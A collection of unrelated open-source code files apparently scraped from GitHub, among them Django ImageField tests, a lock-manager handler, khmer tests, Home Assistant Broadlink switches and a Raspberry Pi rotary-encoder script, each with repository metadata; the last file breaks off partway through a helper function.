class ImageFieldTests(ImageFieldTestMixin, TestCase):
"""
Tests for ImageField that don't need to be run with each of the
different test model classes.
"""
def test_equal_notequal_hash(self):
"""
Bug #9786: Ensure '==' and '!=' work correctly.
Bug #9508: make sure hash() works as expected (equal items must
hash to the same value).
"""
# Create two Persons with different mugshots.
p1 = self.PersonModel(name="Joe")
p1.mugshot.save("mug", self.file1)
p2 = self.PersonModel(name="Bob")
p2.mugshot.save("mug", self.file2)
self.assertEqual(p1.mugshot == p2.mugshot, False)
self.assertEqual(p1.mugshot != p2.mugshot, True)
# Test again with an instance fetched from the db.
p1_db = self.PersonModel.objects.get(name="Joe")
self.assertEqual(p1_db.mugshot == p2.mugshot, False)
self.assertEqual(p1_db.mugshot != p2.mugshot, True)
# Instance from db should match the local instance.
self.assertEqual(p1_db.mugshot == p1.mugshot, True)
self.assertEqual(hash(p1_db.mugshot), hash(p1.mugshot))
self.assertEqual(p1_db.mugshot != p1.mugshot, False)
def test_instantiate_missing(self):
"""
If the underlying file is unavailable, still create instantiate the
object without error.
"""
p = self.PersonModel(name="Joan")
p.mugshot.save("shot", self.file1)
p = self.PersonModel.objects.get(name="Joan")
path = p.mugshot.path
shutil.move(path, path + '.moved')
self.PersonModel.objects.get(name="Joan")
def test_delete_when_missing(self):
"""
Bug #8175: correctly delete an object where the file no longer
exists on the file system.
"""
p = self.PersonModel(name="Fred")
p.mugshot.save("shot", self.file1)
os.remove(p.mugshot.path)
p.delete()
def test_size_method(self):
"""
Bug #8534: FileField.size should not leave the file open.
"""
p = self.PersonModel(name="Joan")
p.mugshot.save("shot", self.file1)
# Get a "clean" model instance
p = self.PersonModel.objects.get(name="Joan")
# It won't have an opened file.
self.assertEqual(p.mugshot.closed, True)
# After asking for the size, the file should still be closed.
p.mugshot.size
self.assertEqual(p.mugshot.closed, True)
def test_pickle(self):
"""
Tests that ImageField can be pickled, unpickled, and that the
image of the unpickled version is the same as the original.
"""
import pickle
p = Person(name="Joe")
p.mugshot.save("mug", self.file1)
dump = pickle.dumps(p)
p2 = Person(name="Bob")
p2.mugshot = self.file1
loaded_p = pickle.loads(dump)
self.assertEqual(p.mugshot, loaded_p.mugshot)
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldTwoDimensionsTests(ImageFieldTestMixin, TestCase):
"""
Tests behavior of an ImageField and its dimensions fields.
"""
def test_constructor(self):
"""
Tests assigning an image field through the model's constructor.
"""
p = self.PersonModel(name='Joe', mugshot=self.file1)
self.check_dimensions(p, 4, 8)
p.save()
self.check_dimensions(p, 4, 8)
def test_image_after_constructor(self):
"""
Tests behavior when image is not passed in constructor.
"""
p = self.PersonModel(name='Joe')
# TestImageField value will default to being an instance of its
# attr_class, a TestImageFieldFile, with name == None, which will
# cause it to evaluate as False.
self.assertIsInstance(p.mugshot, TestImageFieldFile)
self.assertEqual(bool(p.mugshot), False)
# Test setting a fresh created model instance.
p = self.PersonModel(name='Joe')
p.mugshot = self.file1
self.check_dimensions(p, 4, 8)
def test_create(self):
"""
Tests assigning an image in Manager.create().
"""
p = self.PersonModel.objects.create(name='Joe', mugshot=self.file1)
self.check_dimensions(p, 4, 8)
def test_default_value(self):
"""
Tests that the default value for an ImageField is an instance of
the field's attr_class (TestImageFieldFile in this case) with no
name (name set to None).
"""
p = self.PersonModel()
self.assertIsInstance(p.mugshot, TestImageFieldFile)
self.assertEqual(bool(p.mugshot), False)
def test_assignment_to_None(self):
"""
Tests that assigning ImageField to None clears dimensions.
"""
p = self.PersonModel(name='Joe', mugshot=self.file1)
self.check_dimensions(p, 4, 8)
# If image assigned to None, dimension fields should be cleared.
p.mugshot = None
self.check_dimensions(p, None, None)
p.mugshot = self.file2
self.check_dimensions(p, 8, 4)
def test_field_save_and_delete_methods(self):
"""
Tests assignment using the field's save method and deletion using
the field's delete method.
"""
p = self.PersonModel(name='Joe')
p.mugshot.save("mug", self.file1)
self.check_dimensions(p, 4, 8)
# A new file should update dimensions.
p.mugshot.save("mug", self.file2)
self.check_dimensions(p, 8, 4)
# Field and dimensions should be cleared after a delete.
p.mugshot.delete(save=False)
self.assertEqual(p.mugshot, None)
self.check_dimensions(p, None, None)
def test_dimensions(self):
"""
Checks that dimensions are updated correctly in various situations.
"""
p = self.PersonModel(name='Joe')
# Dimensions should get set if file is saved.
p.mugshot.save("mug", self.file1)
self.check_dimensions(p, 4, 8)
# Test dimensions after fetching from database.
p = self.PersonModel.objects.get(name='Joe')
# Bug 11084: Dimensions should not get recalculated if file is
# coming from the database. We test this by checking if the file
# was opened.
self.assertEqual(p.mugshot.was_opened, False)
self.check_dimensions(p, 4, 8)
# After checking dimensions on the image field, the file will have
# opened.
self.assertEqual(p.mugshot.was_opened, True)
# Dimensions should now be cached, and if we reset was_opened and
# check dimensions again, the file should not have opened.
p.mugshot.was_opened = False
self.check_dimensions(p, 4, 8)
self.assertEqual(p.mugshot.was_opened, False)
# If we assign a new image to the instance, the dimensions should
# update.
p.mugshot = self.file2
self.check_dimensions(p, 8, 4)
# Dimensions were recalculated, and hence file should have opened.
self.assertEqual(p.mugshot.was_opened, True)
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldNoDimensionsTests(ImageFieldTwoDimensionsTests):
"""
Tests behavior of an ImageField with no dimension fields.
"""
PersonModel = Person
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldOneDimensionTests(ImageFieldTwoDimensionsTests):
"""
Tests behavior of an ImageField with one dimensions field.
"""
PersonModel = PersonWithHeight
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldDimensionsFirstTests(ImageFieldTwoDimensionsTests):
"""
Tests behavior of an ImageField where the dimensions fields are
defined before the ImageField.
"""
PersonModel = PersonDimensionsFirst
@skipIf(Image is None, "Pillow is required to test ImageField")
class ImageFieldUsingFileTests(ImageFieldTwoDimensionsTests):
"""
Tests behavior of an ImageField when assigning it a File instance
rather than an ImageFile instance.
"""
PersonModel = PersonDimensionsFirst
File = File
@skipIf(Image is None, "Pillow is required to test ImageField")
class TwoImageFieldTests(ImageFieldTestMixin, TestCase):
"""
Tests a model with two ImageFields.
"""
PersonModel = PersonTwoImages
def test_constructor(self):
p = self.PersonModel(mugshot=self.file1, headshot=self.file2)
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
p.save()
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
def test_create(self):
p = self.PersonModel.objects.create(mugshot=self.file1,
headshot=self.file2)
self.check_dimensions(p, 4, 8)
self.check_dimensions(p, 8, 4, 'headshot')
def test_assignment(self):
p = self.PersonModel()
self.check_dimensions(p, None, None, 'mugshot')
self.check_dimensions(p, None, None, 'headshot')
p.mugshot = self.file1
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, None, None, 'headshot')
p.headshot = self.file2
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
# Clear the ImageFields one at a time.
p.mugshot = None
self.check_dimensions(p, None, None, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
p.headshot = None
self.check_dimensions(p, None, None, 'mugshot')
self.check_dimensions(p, None, None, 'headshot')
def test_field_save_and_delete_methods(self):
p = self.PersonModel(name='Joe')
p.mugshot.save("mug", self.file1)
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, None, None, 'headshot')
p.headshot.save("head", self.file2)
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
# We can use save=True when deleting the image field with null=True
# dimension fields and the other field has an image.
p.headshot.delete(save=True)
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, None, None, 'headshot')
p.mugshot.delete(save=False)
self.check_dimensions(p, None, None, 'mugshot')
self.check_dimensions(p, None, None, 'headshot')
def test_dimensions(self):
"""
Checks that dimensions are updated correctly in various situations.
"""
p = self.PersonModel(name='Joe')
# Dimensions should get set for the saved file.
p.mugshot.save("mug", self.file1)
p.headshot.save("head", self.file2)
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
# Test dimensions after fetching from database.
p = self.PersonModel.objects.get(name='Joe')
# Bug 11084: Dimensions should not get recalculated if file is
# coming from the database. We test this by checking if the file
# was opened.
self.assertEqual(p.mugshot.was_opened, False)
self.assertEqual(p.headshot.was_opened, False)
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
# After checking dimensions on the image fields, the files will
# have been opened.
self.assertEqual(p.mugshot.was_opened, True)
self.assertEqual(p.headshot.was_opened, True)
# Dimensions should now be cached, and if we reset was_opened and
# check dimensions again, the file should not have opened.
p.mugshot.was_opened = False
p.headshot.was_opened = False
self.check_dimensions(p, 4, 8, 'mugshot')
self.check_dimensions(p, 8, 4, 'headshot')
self.assertEqual(p.mugshot.was_opened, False)
self.assertEqual(p.headshot.was_opened, False)
# If we assign a new image to the instance, the dimensions should
# update.
p.mugshot = self.file2
p.headshot = self.file1
self.check_dimensions(p, 8, 4, 'mugshot')
self.check_dimensions(p, 4, 8, 'headshot')
# Dimensions were recalculated, and hence file should have opened.
self.assertEqual(p.mugshot.was_opened, True)
self.assertEqual(p.headshot.was_opened, True)
|
{
"content_hash": "416e264595bb5802d9023e15e78e6b6e",
"timestamp": "",
"source": "github",
"line_count": 447,
"max_line_length": 80,
"avg_line_length": 36.24384787472036,
"alnum_prop": 0.6361335720017283,
"repo_name": "krisys/django",
"id": "a27476ff8d23d1b4181cb0d31c256f162f9f7b0b",
"size": "16201",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tests/model_fields/test_imagefield.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52372"
},
{
"name": "HTML",
"bytes": "172129"
},
{
"name": "JavaScript",
"bytes": "255773"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11591744"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
from rdlm.request_handler import RequestHandler, admin_authenticated
from rdlm.lock import LOCK_MANAGER_INSTANCE
from rdlm.hal import Resource
class ResourcesHandler(RequestHandler):
"""Class which handles the /resources URL"""
SUPPORTED_METHODS = ['GET', 'DELETE']
@admin_authenticated
def delete(self):
'''
@summary: deals with DELETE request (deleting all resources)
'''
LOCK_MANAGER_INSTANCE.remove_all_resources()
self.send_status(204)
@admin_authenticated
def get(self):
'''
@summary: deals with GET request (getting a JSON HAL of resources)
'''
resources = Resource(self.reverse_url("resources"))
resources_names = LOCK_MANAGER_INSTANCE.get_resources_names()
for resource_name in resources_names:
tmp = LOCK_MANAGER_INSTANCE.get_resource_as_dict(resource_name)
resource = Resource(self.reverse_url("resource", tmp['name']), {"name": tmp['name']})
resources.add_embedded_resource("resources", resource)
self.set_header("Content-Type", "application/hal+json")
self.finish(resources.to_json())
|
{
"content_hash": "0e0b1d31014c35c1d47838053595071d",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 97,
"avg_line_length": 37.645161290322584,
"alnum_prop": 0.6580976863753213,
"repo_name": "thefab/restful-distributed-lock-manager",
"id": "8be376bf6762201df4ebbbfc504ced857684ee00",
"size": "1349",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdlm/resources_handler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53356"
}
],
"symlink_target": ""
}
|
import sys
import toml
import os
path = toml.load("pyproject.toml")["tool"]["towncrier"]["directory"]
fragments = os.listdir(path)
fragments.remove("README.rst")
fragments.remove("template.rst")
if fragments:
print("The following files were not found by towncrier:")
print(" " + " \n".join(fragments))
sys.exit(1)
|
{
"content_hash": "f9089254b77d4efb6a6aef92f57a9ead",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 68,
"avg_line_length": 23.928571428571427,
"alnum_prop": 0.6835820895522388,
"repo_name": "WarrenWeckesser/numpy",
"id": "c2e03154945d01770f3c765e0515be198c73aea5",
"size": "359",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tools/ci/test_all_newsfragments_used.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "9059444"
},
{
"name": "C++",
"bytes": "174989"
},
{
"name": "Fortran",
"bytes": "10884"
},
{
"name": "JavaScript",
"bytes": "16928"
},
{
"name": "Makefile",
"bytes": "4290"
},
{
"name": "Python",
"bytes": "8313055"
},
{
"name": "Shell",
"bytes": "9612"
},
{
"name": "sed",
"bytes": "5741"
}
],
"symlink_target": ""
}
|
from django import forms
class AuthorizeRequestTokenForm(forms.Form):
oauth_token = forms.CharField(widget=forms.HiddenInput)
authorize_access = forms.BooleanField(required=True)
|
{
"content_hash": "2c7628e19b42693ed03d1d3cd359255d",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 59,
"avg_line_length": 31.5,
"alnum_prop": 0.7936507936507936,
"repo_name": "tttthemanCorp/CardmeleonAppEngine",
"id": "078fdf3fe9e897113544c1bcc742a560ffce41b4",
"size": "189",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "piston/authentication/oauth/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "92014"
},
{
"name": "Python",
"bytes": "4453096"
}
],
"symlink_target": ""
}
|
import random
from khmer import SmallCounttable
from . import khmer_tst_utils as utils
# This mostly tests the underlying NibbleStorage class
def test_single_add():
sct = SmallCounttable(4, 1e6, 4)
sct.add("AAAA")
assert sct.get("AAAA") == 1
def test_split_byte_murmur():
# check the byte is correctly split when using murmur hash
sct = SmallCounttable(4, 4, 1)
# these kmers were carefully chosen to have hash values that produce
# consecutive indices in the count table.
a = "AAAC"
b = "AAAG"
assert sct.get_kmer_hashes(a) == [11898086063751343884]
assert sct.get_kmer_hashes(b) == [10548630838975263317]
sct.add(a)
assert sct.get(a) == 1
assert sct.get(b) == 0
def test_overflow():
# check that we do not overflow into other part of the byte
sct = SmallCounttable(4, 1e6, 4)
a = "AAAA"
b = "AAAT"
# try to overflow our 4bit counter
for n in range(17):
sct.add(a)
assert sct.get(a) == 15
assert sct.get(b) == 0
# repeat with the other kmer that hashes to the other half of the byte
sct = SmallCounttable(4, 1e6, 4)
a = "AAAA"
b = "AAAT"
# try to overflow our 4bit counter
for n in range(17):
sct.add(b)
assert sct.get(b) == 15
assert sct.get(a) == 0
def test_random_kmers():
# check for out-of-bounds errors and similar with random kmers
rng = random.Random(1)
sct = SmallCounttable(20, 1e2, 4)
kmers = ["".join(rng.choice("ACGT") for _ in range(20))
for n in range(400)]
for kmer in kmers:
sct.add(kmer)
for kmer in kmers:
sct.get(kmer)
def test_read_write():
rng = random.Random(1)
sct = SmallCounttable(20, 1e2, 4)
kmers = ["".join(rng.choice("ACGT") for _ in range(20))
for n in range(400)]
for kmer in kmers:
sct.add(kmer)
fname = utils.get_temp_filename('zzz')
sct.save(fname)
# on purpose choose parameters that are different from sct
sct2 = SmallCounttable.load(fname)
assert sct.ksize() == sct2.ksize()
for kmer in kmers:
assert sct.get(kmer) == sct2.get(kmer)
|
{
"content_hash": "e08fd5a4dae9bec85619aca38650833d",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 74,
"avg_line_length": 23.225806451612904,
"alnum_prop": 0.6203703703703703,
"repo_name": "souravsingh/khmer",
"id": "24943bb24c0126fd69bfe3e3d225e0b6f9f8f578",
"size": "3880",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_nibblestorage.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "500623"
},
{
"name": "GLSL",
"bytes": "493"
},
{
"name": "Makefile",
"bytes": "22719"
},
{
"name": "Python",
"bytes": "1282062"
},
{
"name": "Roff",
"bytes": "9581"
},
{
"name": "Shell",
"bytes": "5544"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('reviews_manager', '0014_auto_20170609_1336'),
]
operations = [
migrations.CreateModel(
name='ReviewsComparison',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('creation_date', models.DateTimeField(default=django.utils.timezone.now)),
('start_date', models.DateTimeField(default=None, null=True, blank=True)),
('completion_date', models.DateTimeField(default=None, null=True, blank=True)),
('positive_match', models.NullBooleanField(default=None)),
('review_1', models.OneToOneField(related_name='first_review', on_delete=django.db.models.deletion.PROTECT, to='reviews_manager.ClinicalAnnotationStep')),
('review_2', models.OneToOneField(related_name='second_review', on_delete=django.db.models.deletion.PROTECT, to='reviews_manager.ClinicalAnnotationStep')),
('review_3', models.OneToOneField(related_name='gold_standard', null=True, on_delete=django.db.models.deletion.PROTECT, default=None, blank=True, to='reviews_manager.ClinicalAnnotationStep')),
],
),
migrations.AlterField(
model_name='clinicalannotation',
name='rois_review',
field=models.ForeignKey(related_name='clinical_annotations', on_delete=django.db.models.deletion.PROTECT, to='reviews_manager.ROIsAnnotation'),
),
]
|
{
"content_hash": "671880bfd1db114ea3b335b228ce4504",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 208,
"avg_line_length": 51.75757575757576,
"alnum_prop": 0.6610070257611241,
"repo_name": "lucalianas/ProMort",
"id": "2a8bd429e79f14113afbf3f85fcbd1aa74250c80",
"size": "2831",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "promort/reviews_manager/migrations/0015_auto_20170719_1248.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23712"
},
{
"name": "HTML",
"bytes": "222239"
},
{
"name": "JavaScript",
"bytes": "486991"
},
{
"name": "Python",
"bytes": "738944"
}
],
"symlink_target": ""
}
|
"""Support for Broadlink switches."""
from __future__ import annotations
from abc import ABC, abstractmethod
import logging
from broadlink.exceptions import BroadlinkException
import voluptuous as vol
from homeassistant.components.switch import (
PLATFORM_SCHEMA,
SwitchDeviceClass,
SwitchEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_HOST,
CONF_MAC,
CONF_NAME,
CONF_SWITCHES,
CONF_TIMEOUT,
CONF_TYPE,
STATE_ON,
Platform,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from .const import DOMAIN
from .entity import BroadlinkEntity
from .helpers import data_packet, import_device, mac_address
_LOGGER = logging.getLogger(__name__)
CONF_SLOTS = "slots"
SWITCH_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_COMMAND_OFF): data_packet,
vol.Optional(CONF_COMMAND_ON): data_packet,
}
)
PLATFORM_SCHEMA = vol.All(
cv.deprecated(CONF_HOST),
cv.deprecated(CONF_SLOTS),
cv.deprecated(CONF_TIMEOUT),
cv.deprecated(CONF_TYPE),
PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_MAC): mac_address,
vol.Optional(CONF_HOST): cv.string,
vol.Optional(CONF_SWITCHES, default=[]): vol.All(
cv.ensure_list,
[SWITCH_SCHEMA],
),
}
),
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Import the device and set up custom switches.
This is for backward compatibility.
Do not use this method.
"""
mac_addr = config[CONF_MAC]
host = config.get(CONF_HOST)
if switches := config.get(CONF_SWITCHES):
platform_data = hass.data[DOMAIN].platforms.setdefault(Platform.SWITCH, {})
platform_data.setdefault(mac_addr, []).extend(switches)
else:
_LOGGER.warning(
"The switch platform is deprecated, except for custom IR/RF "
"switches. Please refer to the Broadlink documentation to "
"catch up"
)
if host:
import_device(hass, host)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Broadlink switch."""
device = hass.data[DOMAIN].devices[config_entry.entry_id]
switches: list[BroadlinkSwitch] = []
if device.api.type in {"RM4MINI", "RM4PRO", "RMMINI", "RMMINIB", "RMPRO"}:
platform_data = hass.data[DOMAIN].platforms.get(Platform.SWITCH, {})
user_defined_switches = platform_data.get(device.api.mac, {})
switches.extend(
BroadlinkRMSwitch(device, config) for config in user_defined_switches
)
elif device.api.type == "SP1":
switches.append(BroadlinkSP1Switch(device))
elif device.api.type in {"SP2", "SP2S", "SP3", "SP3S", "SP4", "SP4B"}:
switches.append(BroadlinkSP2Switch(device))
elif device.api.type == "BG1":
switches.extend(BroadlinkBG1Slot(device, slot) for slot in range(1, 3))
elif device.api.type == "MP1":
switches.extend(BroadlinkMP1Slot(device, slot) for slot in range(1, 5))
async_add_entities(switches)
class BroadlinkSwitch(BroadlinkEntity, SwitchEntity, RestoreEntity, ABC):
"""Representation of a Broadlink switch."""
_attr_assumed_state = True
_attr_device_class = SwitchDeviceClass.SWITCH
def __init__(self, device, command_on, command_off):
"""Initialize the switch."""
super().__init__(device)
self._command_on = command_on
self._command_off = command_off
self._attr_name = f"{device.name} Switch"
async def async_added_to_hass(self):
"""Call when the switch is added to hass."""
state = await self.async_get_last_state()
self._attr_is_on = state is not None and state.state == STATE_ON
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn on the switch."""
if await self._async_send_packet(self._command_on):
self._attr_is_on = True
self.async_write_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn off the switch."""
if await self._async_send_packet(self._command_off):
self._attr_is_on = False
self.async_write_ha_state()
@abstractmethod
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
class BroadlinkRMSwitch(BroadlinkSwitch):
"""Representation of a Broadlink RM switch."""
def __init__(self, device, config):
"""Initialize the switch."""
super().__init__(
device, config.get(CONF_COMMAND_ON), config.get(CONF_COMMAND_OFF)
)
self._attr_name = config[CONF_NAME]
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
device = self._device
if packet is None:
return True
try:
await device.async_request(device.api.send_data, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkSP1Switch(BroadlinkSwitch):
"""Representation of a Broadlink SP1 switch."""
def __init__(self, device):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._attr_unique_id = self._device.unique_id
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
device = self._device
try:
await device.async_request(device.api.set_power, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkSP2Switch(BroadlinkSP1Switch):
"""Representation of a Broadlink SP2 switch."""
_attr_assumed_state = False
def __init__(self, device, *args, **kwargs):
"""Initialize the switch."""
super().__init__(device, *args, **kwargs)
self._attr_is_on = self._coordinator.data["pwr"]
def _update_state(self, data):
"""Update the state of the entity."""
self._attr_is_on = data["pwr"]
class BroadlinkMP1Slot(BroadlinkSwitch):
"""Representation of a Broadlink MP1 slot."""
_attr_assumed_state = False
def __init__(self, device, slot):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._slot = slot
self._attr_is_on = self._coordinator.data[f"s{slot}"]
self._attr_name = f"{device.name} S{slot}"
self._attr_unique_id = f"{device.unique_id}-s{slot}"
def _update_state(self, data):
"""Update the state of the entity."""
self._attr_is_on = data[f"s{self._slot}"]
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
device = self._device
try:
await device.async_request(device.api.set_power, self._slot, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkBG1Slot(BroadlinkSwitch):
"""Representation of a Broadlink BG1 slot."""
_attr_assumed_state = False
def __init__(self, device, slot):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._slot = slot
self._attr_is_on = self._coordinator.data[f"pwr{slot}"]
self._attr_name = f"{device.name} S{slot}"
self._attr_device_class = SwitchDeviceClass.OUTLET
self._attr_unique_id = f"{device.unique_id}-s{slot}"
def _update_state(self, data):
"""Update the state of the entity."""
self._attr_is_on = data[f"pwr{self._slot}"]
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
device = self._device
state = {f"pwr{self._slot}": packet}
try:
await device.async_request(device.api.set_state, **state)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
|
{
"content_hash": "d3edee4bbc27f882509fd0fe38d6d657",
"timestamp": "",
"source": "github",
"line_count": 282,
"max_line_length": 83,
"avg_line_length": 30.97517730496454,
"alnum_prop": 0.6244991413852318,
"repo_name": "rohitranjan1991/home-assistant",
"id": "6a015748bd0edbbdb88318f58c06022f3bea5b15",
"size": "8735",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/broadlink/switch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1017265"
},
{
"name": "Python",
"bytes": "1051086"
},
{
"name": "Shell",
"bytes": "3946"
}
],
"symlink_target": ""
}
|
from gpiozero import LED
from gpiozero import Button
import time
import pigpio
import rotary_encoder
import uinput
device = uinput.Device([
uinput.KEY_X,
uinput.KEY_N,
uinput.KEY_M,
])
led = LED(17)
button = Button(2)
def pushedme():
print('You pushed me')
device.emit_click(uinput.KEY_X)
button.when_pressed = pushedme
pos = 0
def callback(way):
global pos
pos += way
print("pos={}".format(pos))
if way < 0:
device.emit_click(uinput.KEY_N)
else:
device.emit_click(uinput.KEY_M)
pi = pigpio.pi()
decoder = rotary_encoder.decoder(pi, 7, 8, callback)
raw_input()
decoder.cancel()
pi.stop()
|
{
"content_hash": "d5c481d5ed6df8c0bea718a8ec40e651",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 52,
"avg_line_length": 15.523809523809524,
"alnum_prop": 0.6595092024539877,
"repo_name": "philipbeber/karaoke",
"id": "395446b61ada8b4da3ae24c46c96a1c009b5e8da",
"size": "652",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pi/rotary_to_keypress.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7982"
},
{
"name": "HTML",
"bytes": "12483"
},
{
"name": "JavaScript",
"bytes": "28306"
},
{
"name": "Python",
"bytes": "3501"
},
{
"name": "Shell",
"bytes": "1737"
}
],
"symlink_target": ""
}
|
"""
A coin is a collectable object. All the coins need tob e collected before allowing the player to
take off in the space ship.
"""
from gameobject import GameObject
import assets
import components
import statevars
import statemgr
class Coin(GameObject):
def __init__(self, scene, name, x, y, **kwargs):
super(Coin, self).__init__(scene, name, x, y)
self.sprite = components.AnimSprite(self, assets.getSpriteAnim("anims/coin.json"), "spin")
self.collider = components.SpriteCollide(self, 0, 0, 16, 16)
self.sound = assets.getSound("sounds/coin.wav")
def init(self):
"""Initiation code."""
self.obj_mgr.normal_update.append(self)
self.collider.addToGroup(self.obj_mgr.player_touchable)
# If this coin has already been collected, remove it from the map.
if self.name in statevars.variables["map"].get("coins", []):
self.kill()
def destroy(self):
"""Clean up code."""
self.obj_mgr.normal_update.remove(self)
self.sprite.destroy()
self.collider.removeFromGroup(self.obj_mgr.player_touchable)
def update(self, td):
self.sprite.updateAnim(td)
def spriteCollide(self, gameobject, collider):
"""Since this is in the player_touchable group, this will only be called when the player touches the coin."""
self.sound.play()
self.kill()
# Keep track of this coin being collected so it will stay gone after saving and loading.
if statevars.variables["map"].get("coins") == None:
statevars.variables["map"]["coins"] = [self.name]
else:
statevars.variables["map"]["coins"].append(self.name)
statemgr.get("play").getCoin()
def debug_draw(self, surface, camera_x, camera_y):
super(Coin, self).debug_draw(surface, camera_x, camera_y)
self.sprite.debug_draw(surface, camera_x, camera_y)
self.collider.debug_draw(surface, camera_x, camera_y)
|
{
"content_hash": "87e2ab634b569add0f547e06e64bc093",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 117,
"avg_line_length": 39.64,
"alnum_prop": 0.649848637739657,
"repo_name": "ArmchairArmada/COS125Project01",
"id": "9a7174da859ae6c734e0d227cdb2bc02537f66fe",
"size": "2005",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/gameobjects/coin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "392096"
},
{
"name": "Shell",
"bytes": "43"
}
],
"symlink_target": ""
}
|
from flask import (
request,
jsonify as flask_jsonify,
)
from urllib.parse import urlparse, urlunparse
from .structures import CaseInsensitiveDict
import json
ENV_HEADERS = (
'X-Varnish',
'X-Request-Start',
'X-Heroku-Queue-Depth',
'X-Real-Ip',
'X-Forwarded-Proto',
'X-Forwarded-Protocol',
'X-Forwarded-Ssl',
'X-Heroku-Queue-Wait-Time',
'X-Forwarded-For',
'X-Heroku-Dynos-In-Use',
'X-Forwarded-Protocol',
'X-Forwarded-Port',
'X-Request-Id',
'Via',
'Total-Route-Time',
'Connect-Time'
)
def assert_with_message(param_name, expected_value, actual_value):
assert expected_value == actual_value, "Expected '{}' to be '{}', got '{}'".format(
param_name, expected_value, actual_value
)
def jsonify(*args, **kwargs):
response = flask_jsonify(*args, **kwargs)
if not response.data.endswith(b"\n"):
response.data += b"\n"
return response
def get_url(request):
"""
Since we might be hosted behind a proxy, we need to check the
X-Forwarded-Proto, X-Forwarded-Protocol, or X-Forwarded-SSL headers
to find out what protocol was used to access us.
"""
protocol = request.headers.get('X-Forwarded-Proto') or request.headers.get('X-Forwarded-Protocol')
